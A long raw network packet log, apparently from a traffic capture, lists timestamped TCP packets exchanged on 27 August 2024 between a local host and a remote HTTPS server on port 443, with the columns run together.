                                                Aug 27, 2024 12:55:15.328537941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328552961 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328587055 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328607082 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.328613997 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328653097 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.328901052 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.944715023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.944720984 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.944746017 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.944778919 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.945288897 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.945318937 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.945352077 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.945357084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.945384979 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.989980936 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.029238939 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.029258013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.029357910 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.029366970 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.029417038 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.029656887 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.029674053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.029731989 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.029742002 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.029787064 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.030159950 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.030174971 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.030217886 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.030225039 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.030251980 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.030261993 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.030710936 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.030730963 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.030783892 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.030792952 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.030833960 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.031471968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.031486988 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.031578064 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.031586885 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.031631947 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.031814098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.031843901 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.031872034 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.031877995 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.031903028 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.031913042 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.032218933 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.032233000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.032289028 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.032296896 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.032310009 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.032337904 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.032737970 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.032752991 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.032794952 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.032803059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.032824039 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.032843113 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.118088007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.118105888 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.118176937 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.118189096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.118230104 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.118643999 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.118658066 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.118711948 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.118719101 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.118760109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.118921041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.118937016 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.118980885 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.118988991 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.119014978 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.119029045 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.119999886 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.120014906 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.120075941 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.120083094 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.120119095 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.120830059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.120858908 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.120928049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.120934963 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.120944023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.120944977 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.120968103 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.120989084 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.120995998 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.121016979 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.121052027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.122109890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.122124910 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.122178078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.122184992 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.122194052 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.122225046 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.122230053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.122246027 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.122257948 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.122277975 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.122287035 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.122304916 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.122337103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.228074074 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.228091002 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.228162050 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.228173971 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.228216887 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.228630066 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.228643894 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.228692055 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.228698969 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.228719950 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.228745937 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.229289055 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.229310989 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.229373932 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.229389906 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.229434967 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.229530096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.229545116 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.229588985 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.229597092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.229619980 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.229639053 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.230277061 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.230297089 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.230335951 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.230341911 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.230370998 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.230387926 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.230581999 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.230598927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.230642080 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.230649948 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.230699062 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.231223106 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231240034 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231291056 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.231298923 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231338024 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.231743097 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231756926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231810093 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.231816053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231856108 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.319566965 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.319583893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.319715023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.319729090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.319819927 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320168972 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320213079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320244074 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320255041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320266008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320306063 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320739031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320754051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320821047 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320827961 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320883989 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320995092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321010113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321094036 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.321101904 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321154118 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.321578979 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321594000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321667910 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.321674109 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321701050 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.321748018 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322294950 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322313070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322370052 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322376013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322386980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322408915 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322408915 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322418928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322432041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322468042 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322557926 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322948933 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.342298031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.342313051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.342432976 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.342441082 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.342495918 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.407171011 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407186031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407293081 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.407303095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407345057 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.407571077 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407591105 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407633066 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.407639980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407677889 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408384085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408401966 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408447027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408447027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408454895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408510923 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408510923 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408834934 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408849955 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408916950 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408926010 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408936024 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408974886 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409171104 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409188986 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409251928 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409251928 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409260035 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409328938 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409776926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409801960 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409858942 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409858942 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409866095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409909010 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.410024881 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.410039902 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.410151005 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.410151005 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.410157919 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.410223007 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.431878090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.431895018 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.431981087 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.431991100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.432054996 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.494818926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.494834900 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.494954109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.494954109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.494976997 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.495039940 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.137104034 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.137171030 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.137180090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.137223959 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.137733936 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.137748003 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.137795925 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.137805939 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.137845993 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.137845993 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.138282061 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.138297081 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.138361931 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.138370037 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.138452053 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.138906956 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.138921022 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.138994932 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.139003992 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.139060974 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.139709949 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.139725924 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.139832973 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.139846087 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.139910936 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.140043020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.140055895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.140120029 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.140126944 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.140165091 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.140165091 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.144215107 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.173481941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.173496962 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.173564911 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.173577070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.173638105 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.223871946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.223886013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.223969936 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.223978996 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.224030018 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.224545956 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.224561930 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.224617004 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.224625111 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.224654913 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.224662066 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.225239038 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.225254059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.225306034 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.225313902 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.225358963 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.225759983 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.225774050 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.225827932 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.225835085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.225893974 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.225893974 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.225986958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.226006031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.226085901 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.226085901 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.226088047 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.226099968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.226126909 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.226150990 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.226157904 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.226206064 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.226206064 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.228054047 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.228068113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.228138924 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.228146076 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.228231907 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.260504007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.260519981 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.260643959 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.260643959 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.260654926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.260736942 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.319196939 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.319214106 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.319271088 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.319288015 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.319303989 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.319329023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.319466114 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.319480896 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.319525003 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.319533110 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.319556952 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.319610119 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.320055008 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.320069075 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.320131063 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.320137978 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.320152044 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.320188046 CEST49707443192.168.2.552.216.214.209
